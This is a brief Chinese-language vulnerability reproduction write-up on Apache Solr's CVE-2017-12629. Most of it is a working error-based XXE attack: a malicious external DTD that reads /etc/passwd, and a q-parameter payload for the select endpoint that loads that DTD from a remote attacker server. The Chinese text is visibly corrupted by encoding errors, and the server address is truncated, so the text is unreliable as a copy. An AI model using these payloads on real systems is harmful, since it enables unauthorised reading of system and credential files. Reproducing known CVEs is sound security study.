Apache Solr 是一個(gè)開源的搜索服務(wù)器。Solr 使用 Java 語言開發(fā)，主要基于 HTTP 和 Apache Lucene 實(shí)現(xiàn)。原理大致是文檔通過 Http 利用 XML 加到一個(gè)搜索集合中。查詢?cè)摷弦彩峭ㄟ^ http 收到一個(gè) XML/JSON 響應(yīng)來實(shí)現(xiàn)。此次 7.1.0 之前版本總共爆出兩個(gè)漏洞：XML 實(shí)體擴(kuò)展漏洞（XXE）和遠(yuǎn)程命令執(zhí)行漏洞（RCE），二者可以連接成利用鏈，編號(hào)均為 CVE-2017-12629。

漏洞復(fù)現(xiàn)：

利用 Error Based XXE 讀取文件：

遠(yuǎn)程服務(wù)器

passwd.dtd

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % ent "<!ENTITY data SYSTEM ':%file;'>">

payload 對(duì)q參數(shù)url編碼

/solr/demo/select?&q=<?xml version="1.0" ?><!DOCTYPE root[<!ENTITY % ext SYSTEM "http://1.:8777/passwd.dtd">%ext;%ent;]><r>&data;</r>&wt=xml&defType=xmlparser